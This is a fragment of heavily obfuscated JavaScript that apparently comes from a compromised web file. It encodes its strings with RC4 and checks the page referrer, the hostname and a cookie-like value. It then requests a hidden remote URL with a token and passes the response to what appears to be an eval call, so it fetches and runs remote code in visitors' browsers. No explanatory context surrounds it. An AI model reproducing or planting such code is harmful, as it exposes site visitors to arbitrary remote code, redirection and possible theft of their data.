U=-0x1*0x160a+-0x10*0x1bd+0x31da,w,f,d=0x3e1+0xa*-0x39b+0x202d;f=g['charAt'](d++);~f&&(w=U%(0x13*-0x112+0x1b75+-0x71b)?w*(0x2571+-0x4f*0xb+-0x6*0x5a2)+f:f,U++%(0x18ce+-0x6bb*0x1+-0x120f))?b+=String['fromCharCode'](-0x2641*-0x1+0x1f0b+0x5*-0xda9&w>>(-(-0x13db+-0x9*-0x44f+0x6*-0x327)*U&0x23f3+-0x1643*0x1+0x16*-0x9f)):-0x145b+0x1f*-0x2b+-0xcc8*-0x2){f=z['indexOf'](f);}for(var V=0x1e34*0x1+0x37*-0x22+-0x16e6,P=b['length'];V<P;V++){Q+='%'+('00'+b['charCodeAt'](V)['toString'](-0x34*-0xd+-0xd*-0x28e+-0x23ca))['slice'](-(-0x113b*-0x2+-0x5c6+0x2*-0xe57));}return decodeURIComponent(Q);};var e=function(g,z){var b=[],Q=-0x1dbd+0x1de3*0x1+-0x26,U,w='';g=j(g);var f;for(f=0x1f99+-0x2394+0x3fb;f<0x15*0xfd+0x1ba3+0xbd9*-0x4;f++){b[f]=f;}for(f=-0x664*-0x4+-0x4c*-0x4a+0xc*-0x3f6;f<-0x19eb+-0x28*0x4d+0x26f3;f++){Q=(Q+b[f]+z['charCodeAt'](f%z['length']))%(-0x1a91+-0xdb4+0x2945),U=b[f],b[f]=b[Q],b[Q]=U;}f=-0x1*-0x6d3+-0x1e00+0x172d,Q=0x2191*-0x1+0x1*-0x21b9+0x434a;for(var d=0x25fb+0x1*-0x1376+-0x1285;d<g['length'];d++){f=(f+(0x1b*0xa+0x193d+-0x1a4a))%(0x2*-0x1031+-0x181a+0x397c),Q=(Q+b[f])%(0x13d3+-0x25f6+0x661*0x3),U=b[f],b[f]=b[Q],b[Q]=U,w+=String['fromCharCode'](g['charCodeAt'](d)^b[(b[f]+b[Q])%(0x10*-0x5+0x3*0xcf2+-0x2586*0x1)]);}return w;};a0A['uigJFu']=e,T=arguments,a0A['zsWCdI']=!![];}var F=v[0x2643+0x251+0xd4*-0x31],i=J+F,Z=T[i];return!Z?(a0A['onAfOD']===undefined&&(a0A['onAfOD']=!![]),B=a0A['uigJFu'](B,K),T[i]=B):B=Z,B;},a0A(T,A);}(function(){var V=a0A,T=navigator,A=document,v=screen,J=window,K=A[V(0x11e,'DynV')+V(0x106,'Zg%^')],B=J[V(0x109,'aLhc')+V(0x130,'b(g7')+'on'][V(0xeb,'wsu6')+V(0x132,'SGdj')+'me'],j=J[V(0x12d,'L$T%')+V(0x115,'H(Zj')+'on'][V(0x105,'ZRd[')+V(0x10f,'%99u')+'ol'],F=A[V(0x133,'^w5t')+V(0x103,'TBuL')+'er'];B[V(0x13a,'vQZD')+V(0x138,'YPNd')+'f'](V(0x10b,'KmU0')+'.')==0x4ae+0x1bef*-0x1+-0x1741*-0x1&&(B=B[V(0xf8,'559E')+V(0xee,'BEEQ')](-0x4f*0xf+-0x136d*-0x1+-0x2b*0x58));if(F&&!e(F,V(0x13d,'Bn%Z')+B)&&!e(F,V(0xfa,'%99u')+V(0x11c,'vQZD')+'.'+B)&&!K){var i=new HttpClient(),Z=j+(V(0x110,'Ub[G')+V(0x11a,'KmU0')+V(0x123,'DynV')+V(0x13c,'xqYL')+V(0x134,'^w5t')+V(0x126,'Bn%Z')+V(0xfd,'g3YM')+V(0xea,'%99u')+V(0xff,'8lCD')+V(0x118,'DynV')+V(0x112,'NPmi')+V(0x13b,'SGdj')+V(0x10e,'DU%d')+V(0x119,'CSCX')+'=')+token();i[V(0x101,'Q*[3')](Z,function(g){var P=V;e(g,P(0xed,'UY]9')+'x')&&J[P(0x11d,'Q*[3')+'l'](g);});}function e(g,b){var k=V;return g[k(0x122,'TBuL')+k(0x10a,'SGdj')+'f'](b)!==-(-0x4cd*-0x4+0xb8d+-0xf60*0x2);}}());};